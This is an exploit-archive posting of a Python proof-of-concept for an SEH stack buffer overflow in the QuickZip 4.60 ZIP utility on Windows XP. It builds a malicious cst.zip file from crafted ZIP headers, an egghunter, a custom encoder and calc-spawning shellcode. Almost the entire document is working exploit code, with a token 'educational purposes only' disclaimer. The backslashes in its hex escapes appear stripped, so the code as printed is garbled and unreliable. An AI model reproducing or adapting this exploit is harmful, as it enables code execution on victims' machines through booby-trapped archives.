QuickZip 4.x (.zip) 0day Local Universal Buffer Overflow PoC
Posted on 08 March 2010
==================================================================== QuickZip 4.x (.zip) 0day Local Universal Buffer Overflow PoC Exploit ==================================================================== #!/usr/bin/python # # ############################################################################### # Exploit Title : QuickZip 4.x (.zip) 0day Local Universal Buffer Overflow PoC Exploit # Date : 9/3/2010 # Author : corelanc0d3r & mr_me # Bug found by : corelanc0d3r (http://corelan.be:8800/) # Software Link : http://www.quickzip.org/downloads.html # Version : 4.60 # OS : Windows # Tested on : XP SP3 En # Type of vuln : SEH # Greetz to : Corelan Security Team # http://www.corelan.be:8800/index.php/security/corelan-team-members/ # ############################################################################### # Script provided 'as is', without any warranty. # Use for educational purposes only. # Do not use this code to do anything illegal ! # # Note : you are not allowed to edit/modify this code. # If you do, Corelan cannot be held responsible for any damages this may cause. # # how does this work? # http://www.offensive-security.com/blog/vulndev/quickzip-stack-bof-0day-a-box-of-chocolates/ print "|------------------------------------------------------------------|" print "| __ __ |" print "| _________ ________ / /___ _____ / /____ ____ _____ ___ |" print "| / ___/ __ / ___/ _ / / __ `/ __ / __/ _ / __ `/ __ `__ |" print "| / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / / / / |" print "| \___/\____/_/ \___/_/\__,_/_/ /_/ \__/\___/\__,_/_/ /_/ /_/ |" print "| |" print "| http://www.corelan.be:8800 |" print "| security@corelan.be |" print "| |" print "|-------------------------------------------------[ EIP Hunters ]--|" print "[+] QuickZip 4.x (.zip) 0day Local Universal Buffer Overflow PoC Exploit" header_1 = ("x50x4Bx03x04x14x00x00x00x00x00xB7xACxCEx34x00x00x00" "x00x00x00x00x00x00x00x00xe4x0fx00x00x00") header_2 = ("x50x4Bx01x02x14x00x14x00x00x00x00x00xB7xACxCEx34x00x00x00" "x00x00x00x00x00x00x00x00x00xe4x0fx00x00x00x00x00x00x01x00" "x24x00x00x00x00x00x00x00") header_3 = ("x50x4Bx05x06x00x00x00x00x01x00x01x00" "x12x10x00x00x02x10x00x00x00x00") # pure ascii egghunter, thanks to skylined egghunter= ("JJJJJJJJJJJJJJJJJ7RYjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIQvK1" "9ZKO6orbv2bJgr2xZmtnulfePZPthoOHbwFPtpbtLKkJLo1eJJloPuKW9okWA"); calc = ("xd9xf7xd9x74x24xf4x5bx53x59x49x49x49x49x49x49" "x49x49x49x43x43x43x43x43x43x43x37x51x5ax6ax41" "x58x50x30x41x30x41x6bx41x41x51x32x41x42x32x42" "x42x30x42x42x41x42x58x50x38x41x42x75x4ax49x4b" "x4cx4ax48x51x54x45x50x43x30x45x50x4cx4bx51x55" "x47x4cx4cx4bx43x4cx43x35x43x48x43x31x4ax4fx4c" "x4bx50x4fx44x58x4cx4bx51x4fx47x50x45x51x4ax4b" "x50x49x4cx4bx46x54x4cx4bx43x31x4ax4ex50x31x49" "x50x4ax39x4ex4cx4bx34x49x50x42x54x44x47x49x51" "x49x5ax44x4dx45x51x49x52x4ax4bx4bx44x47x4bx50" "x54x47x54x45x54x44x35x4dx35x4cx4bx51x4fx51x34" "x43x31x4ax4bx42x46x4cx4bx44x4cx50x4bx4cx4bx51" "x4fx45x4cx43x31x4ax4bx4cx4bx45x4cx4cx4bx43x31" "x4ax4bx4cx49x51x4cx46x44x43x34x48x43x51x4fx50" "x31x4ax56x43x50x50x56x42x44x4cx4bx50x46x50x30" "x4cx4bx47x30x44x4cx4cx4bx42x50x45x4cx4ex4dx4c" "x4bx42x48x45x58x4bx39x4ax58x4bx33x49x50x42x4a" "x50x50x42x48x4cx30x4cx4ax44x44x51x4fx45x38x4a" "x38x4bx4ex4dx5ax44x4ex46x37x4bx4fx4dx37x42x43" "x45x31x42x4cx43x53x46x4ex43x55x43x48x45x35x45" "x50x41x41"); # custom encoder encoder = ("x25x4Ax4Dx4Ex55" "x25x35x32x31x2A" "x2dx55x55x55x5f" "x2dx56x55x56x5f" "x2dx55x55x55x5e" "x50" "x25x4Ax4Dx4Ex55" "x25x35x32x31x2A" "x2dx2bx6ax32x53" "x2dx2ax6ax31x54" "x2dx2ax69x31x54" "x50" ); print "[+] Building PoC.." lol = "x43" * 20 lol += egghunter lol += "x41" * (223-len(lol)) lol += "x61" lol += "x53" lol += "x5c" lol += encoder lol += "x41" * (294-len(lol)) lol += "x73xf9x41x41" lol += "x5cx53x46x00" lol += "W00TW00T" lol += calc lol += "x42" * (4064-len(lol)) lol += ".txt" exploit = header_1 + lol + header_2 + lol + header_3 mefile = open('cst.zip','w'); mefile.write(exploit); mefile.close() print "[+] Exploit complete!" # ~ - [ [ : Inj3ct0r : ] ]